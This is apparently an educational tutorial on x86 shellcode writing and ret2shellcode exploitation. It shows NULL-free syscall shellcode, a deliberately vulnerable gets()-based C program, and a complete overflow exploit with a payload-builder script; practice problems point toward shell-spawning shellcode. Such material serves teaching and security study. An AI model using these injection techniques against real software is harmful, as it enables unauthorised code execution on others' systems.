ret2shellcode
Shellcode¶
```c
/* hello_world.c */
#include <stdio.h>

int main(int argc, char *argv[])
{
    printf("HelloWorld !\n");
    return 0;
}
```
The computer can't understand high-level languages; it only understands machine language, which is ultimately just 1s and 0s. So we use a program called a compiler, which converts our human-readable source code into machine code.
```shell
gcc hello_world.c -o hello_world
```
When you compile the above code, the compiler translates its logic into machine-level instructions that the computer can execute directly.
Note
objdump is a tool used to view information about an ELF file.
```
-D : tells the tool to disassemble the binary information stored inside the executable and print it in assembly language

-M : specifies which syntax the assembly should follow (the default is AT&T)
```
```shell
objdump -D -M intel hello_world
```
```
...
...
00000000000006b0 <main>:
 6b0:   55                      push   rbp
 6b1:   48 89 e5                mov    rbp,rsp
 6b4:   48 83 ec 10             sub    rsp,0x10
 6b8:   89 7d fc                mov    DWORD PTR [rbp-0x4],edi
 6bb:   48 89 75 f0             mov    QWORD PTR [rbp-0x10],rsi
 6bf:   48 8d 3d 9e 00 00 00    lea    rdi,[rip+0x9e]        # 764 <_IO_stdin_used+0x4>
 6c6:   e8 95 fe ff ff          call   560 <puts@plt>
 6cb:   b8 00 00 00 00          mov    eax,0x0
 6d0:   c9                      leave
 6d1:   c3                      ret
...
...
```
Even code written in assembly language can't be executed directly by the computer; it must be translated once more into machine instructions, which consist only of 1s and 0s. As you can see in the listing above, the first assembly instruction of our main is `push rbp`, which is the assembly representation of the byte `0x55`, or `01010101` in binary. This is what the computer actually understands and executes.
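To make the link between the hex column of the disassembly and raw bits concrete, here is a small Python sketch. It only reuses the first four bytes shown in the objdump listing; the helper name `to_bits` is made up for this illustration.

```python
# Bytes of the first two instructions of main, copied from the objdump listing:
#   55          push rbp
#   48 89 e5    mov  rbp,rsp
machine_code = bytes([0x55, 0x48, 0x89, 0xE5])


def to_bits(data):
    """Return every byte as an 8-character string of 0s and 1s."""
    return [format(byte, "08b") for byte in data]


bits = to_bits(machine_code)
for byte, pattern in zip(machine_code, bits):
    print(f"0x{byte:02x} -> {pattern}")
```

The first line printed corresponds to `push rbp`: the single byte `0x55` written out bit by bit.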
When you execute this binary, it is loaded into memory, and the computer executes its instructions one by one, reading them from memory.
```
┌──────────┐    ┌──────────┐    ┌────────────┐
│  fetch   │ ─> │  decode  │ ─> │  execute   │
└──────────┘    └──────────┘    └────────────┘
     ^               ^                ^
     │               │                │_ the operation is performed.
     │               │_ computer understands which operation is to be performed.
     │_ one instruction is fetched from the memory.
```
What if we could inject our own code into the memory of a process and change its control flow to execute that code? We could make the process do things it was never meant to do. But we can't write that logic in C or assembly and place the source text in memory; we must first encode our assembly instructions as machine code and inject that.
Hello World¶
Let's write assembly code that prints "Hello, world!".
Earlier we used the C library function printf to print to the screen. That is not a practical option here, since we are writing bare assembly that will later be injected into another process and cannot assume the C library is available to it.
Syscall
The kernel of an operating system is responsible for managing all the low-level details, and it provides programmers with an interface to them. A system call (syscall) is the programmatic way in which a program requests a service from the operating system's kernel. This may include accessing the hard disk, writing to the screen, reading from a file, and so on.
```shell
$ strace ./hello_world
```
```
execve("./hello_world", ["./hello_world"], [/* 56 vars */]) = 0
brk(NULL)                               = 0x55f1ee7c5000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f5a2c5b4000
...
...
munmap(0x7f5a2c585000, 191761)          = 0
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
brk(NULL)                               = 0x55f1ee7c5000
brk(0x55f1ee7e6000)                     = 0x55f1ee7e6000
write(1, "HelloWorld !\n", 13HelloWorld !
)          = 13
exit_group(0)                           = ?
```
Note
`strace` is a tool that can be used to display the syscalls made by a program.
As you can see, the compiled program does more than just print a string. The system calls at the start are setting up the environment and memory for the program, but the important part is the write() syscall . This is what actually outputs the string.
The Unix manual pages are separated into sections. Section 2 contains the manual pages for system calls, so `man 2 write` will describe the use of the write() system call:
```
WRITE(2)                   Linux Programmer's Manual                  WRITE(2)

NAME
       write - write to a file descriptor

SYNOPSIS
       #include <unistd.h>

       ssize_t write(int fd, const void *buf, size_t count);

DESCRIPTION
       write() writes up to count bytes from the buffer pointed buf to the file referred to by the file descriptor fd.
```
The strace output also shows the arguments for the syscall. The buf and count arguments are a pointer to our string and its length. The fd argument 1 is a special standard file descriptor. File descriptors are used for almost everything in Unix: input, output, file access, network sockets, and so on. A file descriptor is a number used to access an open file or other input/output resource. The first three file descriptor numbers (0, 1, and 2) are automatically used for standard input, output, and error. When you open a new file, the kernel hands back a unique number that refers to that open file, and that number is its file descriptor.
Writing bytes to standard output’s file descriptor of 1 will print the bytes; reading from standard input’s file descriptor of 0 will input bytes. The standard error file descriptor of 2 is used to display the error or debugging messages that can be filtered from the standard output.
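The same write() call can be tried without any C or assembly. The sketch below uses Python's `os.write`, a thin wrapper around the write syscall, with the descriptor numbers described above. The constant names and the choice of `os.devnull` as a file to open are just for illustration.

```python
import os

STDOUT_FD = 1  # standard output
STDERR_FD = 2  # standard error

message = b"HelloWorld !\n"

# os.write(fd, data) returns the number of bytes written, like write(2)
written = os.write(STDOUT_FD, message)
os.write(STDERR_FD, b"this line goes to standard error\n")

# Opening a file yields a fresh descriptor number for that open file
fd = os.open(os.devnull, os.O_WRONLY)
print("descriptor returned by open:", fd)
os.close(fd)
```

Running this under strace should show a `write(1, "HelloWorld !\n", 13)` call much like the one in the trace of the C program.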
In Linux, every syscall is identified by a predefined number, and its arguments are placed in registers. The calling convention differs between 32-bit and 64-bit systems; we will focus on 32-bit shellcode.
On the 32-bit x86 architecture, a syscall is invoked with the `int 0x80` instruction. It calls the syscall whose number is stored in the `eax` register, and the arguments are passed through the `ebx`, `ecx`, and `edx` registers, in that order.
```nasm
section .text           ; Text segment
global _start           ; Default entry point for ELF linking

_start:
    jmp gotoCall        ; Jump to gotoCall

shellcode:
; SYSCALL: write(1,msg,14)
    mov eax, 4          ; Put 4 into eax, since write is syscall #4.
    mov ebx, 1          ; Put 1 into ebx, since stdout is 1.
    pop ecx             ; Pop the address of hello world from the stack
    mov edx, 14         ; Put 14 into edx, since our string is 14 bytes.
    int 0x80            ; Call the kernel to make the system call happen.

; SYSCALL: exit(0)
    mov eax, 1          ; Put 1 into eax, since exit is syscall #1.
    mov ebx, 0          ; Exit with success.
    int 0x80            ; Do the syscall.

gotoCall:
    call shellcode      ; Pushes the address of the string to the stack
    db "Hello, world!", 0x0a    ; The string and newline char
```
```shell
$ nasm -f elf hello_world.asm
$ ld -m elf_i386 hello_world.o
$ ./a.out
```
Note
nasm is an assembler, which converts the assembly program into a binary object file the machine understands. ld is used to create an executable from the output of nasm.
The above assembly code prints "Hello, world!" and exits gracefully. We must avoid any code that relies on absolute addresses, because the shellcode will be injected into a running process, where any address it was assembled with will be invalid. So, to get the address of the string, we first jump to the `gotoCall` label. It contains a call instruction, which pushes the address of the next instruction onto the stack (here, the address of our string) and jumps to the `shellcode` label. Now we can pop that address from the stack.
We can use objdump to extract the assembled machine instructions.
```shell
$ objdump -D -M intel a.out
```
```
...
...
08048060 <_start>:
 8048060:   eb 1e                   jmp    8048080 <gotoCall>

08048062 <shellcode>:
 8048062:   b8 04 00 00 00          mov    eax,0x4
 8048067:   bb 01 00 00 00          mov    ebx,0x1
 804806c:   59                      pop    ecx
 804806d:   ba 0e 00 00 00          mov    edx,0xe
 8048072:   cd 80                   int    0x80
 8048074:   b8 01 00 00 00          mov    eax,0x1
 8048079:   bb 00 00 00 00          mov    ebx,0x0
 804807e:   cd 80                   int    0x80

08048080 <gotoCall>:
 8048080:   e8 dd ff ff ff          call   8048062 <shellcode>
 8048085:   48                      dec    eax                          ─
 8048086:   65 6c                   gs ins BYTE PTR es:[edi],dx         │
 8048088:   6c                      ins    BYTE PTR es:[edi],dx         │
 8048089:   6f                      outs   dx,DWORD PTR ds:[esi]        │ "Hello, world!"
 804808a:   2c 20                   sub    al,0x20                      │
 804808c:   77 6f                   ja     80480fd <gotoCall+0x7d>      │
 804808e:   72 6c                   jb     80480fc <gotoCall+0x7c>      │
 8048090:   64 21 0a                and    DWORD PTR fs:[edx],ecx       ─
...
...
```
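The reason this code is position independent is that both `jmp` and `call` are encoded with a signed displacement relative to the next instruction, not with an absolute address. The following Python sketch decodes the two displacements from the listing and checks that they land on the labels objdump reports. The function name `rel_target` is invented for this example; the addresses and bytes are copied from the listing.

```python
import struct


def rel_target(insn_addr, insn_bytes, opcode_len=1):
    """Destination of a relative jmp/call.

    The bytes after the opcode are a signed little-endian displacement,
    measured from the address of the *next* instruction.
    """
    disp_bytes = insn_bytes[opcode_len:]
    fmt = {1: "<b", 4: "<i"}[len(disp_bytes)]  # rel8 or rel32
    (disp,) = struct.unpack(fmt, disp_bytes)
    return insn_addr + len(insn_bytes) + disp


# eb 1e          jmp  gotoCall   (at 0x8048060)
jmp_target = rel_target(0x8048060, bytes.fromhex("eb1e"))
# e8 dd ff ff ff call shellcode  (at 0x8048080)
call_insn = bytes.fromhex("e8ddffffff")
call_target = rel_target(0x8048080, call_insn)
# The call pushes the address of whatever follows it: our string
string_addr = 0x8048080 + len(call_insn)

print(hex(jmp_target), hex(call_target), hex(string_addr))
```

Because only distances are encoded, the same bytes keep working wherever they are loaded, and the address popped into `ecx` is always the address of the string at run time.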
The resultant shellcode is
```
"\xeb\x1e\xb8\x04\x00\x00\x00\xbb\x01\x00\x00\x00\x59\xba\x0e\x00\x00\x00\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xdd\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64\x21\x0a"
```
You can use this code to debug and test the shellcode:
```c
/* shellcode.c */
#include <stdio.h>

unsigned char code[] =
    "\xeb\x1e\xb8\x04\x00\x00\x00\xbb\x01\x00\x00\x00\x59\xba\x0e"
    "\x00\x00\x00\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00"
    "\xcd\x80\xe8\xdd\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x20\x77"
    "\x6f\x72\x6c\x64\x21\x0a";

int main(void)
{
    /* sizeof counts every byte, including embedded NULs;
       strlen would stop at the first one and under-report. */
    printf("Shellcode Length: %zu\n", sizeof(code) - 1);

    /* Treat the byte array as a function and call it. */
    int (*ret)(void) = (int (*)(void))code;

    ret();
    return 0;
}
```
```shell
$ gcc -m32 -fno-stack-protector -z execstack -no-pie shellcode.c
```
We have successfully created shellcode, but there is a problem: NULL bytes. In C, a string is a character array terminated by a NULL character, so a string-handling function that copies or measures our shellcode will stop at the first NULL byte and truncate it. We will therefore always try to make our shellcode NULL-free.
The only way to do that is to use assembly instructions whose encodings contain no NULL bytes.
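To get a feel for how bad the problem is, the short Python sketch below scans the shellcode generated earlier for NULL bytes and shows what a C string function would be left with. The helper names `null_offsets` and `as_c_string_sees_it` are made up for this illustration; the bytes are the ones from the objdump output.

```python
FIRST_SHELLCODE = (
    b"\xeb\x1e\xb8\x04\x00\x00\x00\xbb\x01\x00\x00\x00\x59\xba\x0e"
    b"\x00\x00\x00\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00"
    b"\xcd\x80\xe8\xdd\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x20\x77"
    b"\x6f\x72\x6c\x64\x21\x0a"
)


def null_offsets(code):
    """Offsets of every NULL byte in the shellcode."""
    return [i for i, byte in enumerate(code) if byte == 0]


def as_c_string_sees_it(code):
    """The prefix a C string function processes: everything before the first NULL."""
    return code.split(b"\x00", 1)[0]


offsets = null_offsets(FIRST_SHELLCODE)
survivors = as_c_string_sees_it(FIRST_SHELLCODE)

print("total length:", len(FIRST_SHELLCODE))
print("NULL bytes at offsets:", offsets)
print("bytes that survive a string copy:", survivors.hex())
```

Only the `jmp` and the first two bytes of `mov eax, 0x4` survive, so a string copy would leave nothing usable behind.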
Consider `mov eax, 0x4`. The mov instruction here targets a 32-bit register, so its encoding reserves space for a 32-bit immediate value. Since the constant we supplied occupies only one byte, the other three bytes are NULL. One way to overcome this is to move the value into the low 8-bit part of the register, here `al`:
```
mov al,0x4    ->    B0 04
```
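The two encodings can be reproduced by hand. The sketch below builds them in Python from the opcodes visible in the listings (`B8` followed by a 32-bit little-endian immediate for `mov eax`, `B0` followed by one byte for `mov al`). The function names are hypothetical, and the code covers only these two instruction forms, not a general assembler.

```python
import struct


def encode_mov_eax_imm32(value):
    """mov eax, imm32: opcode 0xB8, then the immediate as 4 little-endian bytes."""
    return b"\xb8" + struct.pack("<I", value)


def encode_mov_al_imm8(value):
    """mov al, imm8: opcode 0xB0, then the immediate as a single byte."""
    return b"\xb0" + struct.pack("<B", value)


wide = encode_mov_eax_imm32(4)
narrow = encode_mov_al_imm8(4)

print(wide.hex(), "-> NULL bytes:", wide.count(0))
print(narrow.hex(), "-> NULL bytes:", narrow.count(0))
```

The padding of the small constant out to 32 bits is exactly where the three NULL bytes come from; the 8-bit form has no room for padding.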
Using the low register produces NULL-free code. When doing this, we must make sure the rest of the register is zero first; otherwise, whatever was left in its upper bytes will corrupt our value.
```nasm
xor eax,eax
```
We can use the xor instruction to zero the register: XORing a register with itself always yields zero.
```nasm
section .text           ; Text segment
global _start           ; Default entry point for ELF linking

_start:
    jmp gotoCall        ; Jump to gotoCall

shellcode:
; SYSCALL: write(1,msg,14)
    xor eax,eax         ; Null the registers
    xor ebx,ebx
    xor edx,edx
                        ; No need to xor ecx, since pop will overwrite any previous value

    mov al, 4           ; Put 4 into eax, since write is syscall #4.
    mov bl, 1           ; Put 1 into ebx, since stdout is 1.
    pop ecx             ; Pop the address of hello world from the stack
    mov dl, 14          ; Put 14 into edx, since our string is 14 bytes.
    int 0x80            ; Call the kernel to make the system call happen.

; SYSCALL: exit(0)
    mov al, 1           ; Put 1 into eax, since exit is syscall #1.
    xor ebx,ebx         ; Exit with success.
    int 0x80            ; Do the syscall.

gotoCall:
    call shellcode      ; Pushes the address of the string to the stack
    db "Hello, world!", 0x0a    ; The string and newline char
```
Shellcode
"\xeb\x15\x31\xc0\x31\xdb\x31\xd2\xb0\x04\xb3\x01\x59\xb2\x0e\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe6\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64\x21\x0a"
Practice Problem
- Write shellcode that opens a file and prints its contents
Use the open syscall to open the file; then you can use the read and write syscalls.
- Write shellcode that spawns a shell
man 2 execve
ret2shellcode¶
Let's get into how we can use our previously created shellcode.
```c
/* ret2shellcode.c */
#include <stdio.h>
#include <string.h>

char buf[0x100];

int main()
{
    char inp[0x100]={0};
    gets(inp);
    strncpy(buf,inp,256);
    return 0;
}
```
Binary file : ret2shellcode
The code clearly has a buffer overflow bug, which lets us change the control flow of the program by overwriting the saved return address of main. The question now is where to jump.
The main function reads input from the user and copies it into a global variable called buf.
Let's look at the memory mapping of the running program:
```
$ pidof ret2shellcode
17255
$ cat /proc/17255/maps
08048000-08049000 r-xp 00000000 08:01 1516600    /tmp/ret2shellcode
08049000-0804a000 r-xp 00000000 08:01 1516600    /tmp/ret2shellcode
0804a000-0804b000 rwxp 00001000 08:01 1516600    /tmp/ret2shellcode
09d0f000-09d30000 rwxp 00000000 00:00 0          [heap]
f754e000-f76ff000 r-xp 00000000 08:01 5115852    /lib/i386-linux-gnu/libc-2.24.so
f76ff000-f7701000 r-xp 001b0000 08:01 5115852    /lib/i386-linux-gnu/libc-2.24.so
f7701000-f7702000 rwxp 001b2000 08:01 5115852    /lib/i386-linux-gnu/libc-2.24.so
f7702000-f7705000 rwxp 00000000 00:00 0
f7734000-f7737000 rwxp 00000000 00:00 0
f7737000-f7739000 r--p 00000000 00:00 0          [vvar]
f7739000-f773b000 r-xp 00000000 00:00 0          [vdso]
f773b000-f775e000 r-xp 00000000 08:01 5115848    /lib/i386-linux-gnu/ld-2.24.so
f775e000-f775f000 r-xp 00022000 08:01 5115848    /lib/i386-linux-gnu/ld-2.24.so
f775f000-f7760000 rwxp 00023000 08:01 5115848    /lib/i386-linux-gnu/ld-2.24.so
ffdd5000-ffdf6000 rwxp 00000000 00:00 0          [stack]
```
This is the memory mapping of our program. In Linux, all the details about a process live in the `/proc/$PID/` directory, and its `maps` file holds the details of the process's memory mapping. The `pidof` command returns the PID of the process.
Notice that the address of buf, `0x804a040`, lies within the range `0x0804a000-0x0804b000`, and the previous output shows that this region has execute permission. That is, if we place valid instructions at that address and redirect execution there, those instructions will be executed.
```
0804a000-0804b000 rwxp 00001000 08:01 1516600    /tmp/ret2shellcode
```
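The same check can be done programmatically. Below is a minimal Python sketch that parses lines in the `/proc/$PID/maps` format and reports whether a given address falls inside an executable region. The function names are invented for this example, and the two sample lines are copied from the output above rather than read from a live process.

```python
def parse_maps_line(line):
    """Split one maps line into (start, end, permissions)."""
    fields = line.split()
    start_hex, end_hex = fields[0].split("-")
    return int(start_hex, 16), int(end_hex, 16), fields[1]


def is_executable(addr, maps_lines):
    """True if addr lies in a mapping whose permissions include 'x'."""
    for line in maps_lines:
        start, end, perms = parse_maps_line(line)
        if start <= addr < end:  # the end address is exclusive
            return "x" in perms
    return False  # address is not mapped at all


MAPS = [
    "0804a000-0804b000 rwxp 00001000 08:01 1516600 /tmp/ret2shellcode",
    "f7737000-f7739000 r--p 00000000 00:00 0 [vvar]",
]
BUF_ADDR = 0x804A040  # address of buf quoted in the text

print("buf executable:", is_executable(BUF_ADDR, MAPS))
```

To inspect a real process, the list could be replaced with the lines of `/proc/<pid>/maps` read from disk.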
So we can supply our shellcode as input and overflow the return address so that it points to buf, and our shellcode will be executed.
Note
If the shellcode contains a null character, the `strncpy` function copies the input only up to that position and discards the rest, which corrupts the shellcode copied into `buf`.
So our payload will contain `shellcode + junk + address of buf (overwrites return address)`.
If you use the shellcode we generated above as is, it will cause a problem: our hello world string ends with a newline, and the `gets` function stops reading when it encounters a newline, so the rest of the payload is never read. We just need to change the last "\x0a" byte to a null byte. Because that null is the very last byte of the shellcode, strncpy still copies everything before it.
Exploit
python -c 'print "\xeb\x15\x31\xc0\x31\xdb\x31\xd2\xb0\x04\xb3\x01\x59\xb2\x0e\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe6\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64\x21\x00" + "A" * 222 + "\x08\x04\xa0\x40"[::-1]' | ./ret2shellcode
```
Hello, world!
```
We have successfully executed the shellcode. You can debug the program with gdb to see the magic happen.
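The exploit one-liner relies on Python 2's `print`, which emits raw bytes. As a sketch of the same payload for Python 3, the script below builds it as a `bytes` object and writes it through `sys.stdout.buffer`, so that bytes above 0x7f are not re-encoded. The names `build_payload` and `PADDING_LEN` are made up here; the shellcode, the padding of 222 bytes and the address `0x0804a040` are taken from the one-liner and apply only to that particular binary.

```python
import struct
import sys

# NULL-free shellcode from above, with the trailing "\x0a" replaced by "\x00"
SHELLCODE = (
    b"\xeb\x15\x31\xc0\x31\xdb\x31\xd2\xb0\x04\xb3\x01\x59\xb2\x0e"
    b"\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe6\xff\xff\xff\x48\x65"
    b"\x6c\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64\x21\x00"
)
PADDING_LEN = 222       # junk between shellcode and return address (from the one-liner)
BUF_ADDR = 0x0804A040   # address of buf in this specific binary


def build_payload(shellcode, padding_len, ret_addr):
    """shellcode + junk + little-endian address that overwrites the return address."""
    return shellcode + b"A" * padding_len + struct.pack("<I", ret_addr)


payload = build_payload(SHELLCODE, PADDING_LEN, BUF_ADDR)

if __name__ == "__main__":
    # gets() stops at the newline, so it is appended only at the very end
    sys.stdout.buffer.write(payload + b"\n")
```

Saved under a name of your choice, say `exploit.py`, it would be used as `python3 exploit.py | ./ret2shellcode`. `struct.pack("<I", ...)` does the same job as the `[::-1]` reversal in the one-liner: it lays the address out in little-endian byte order.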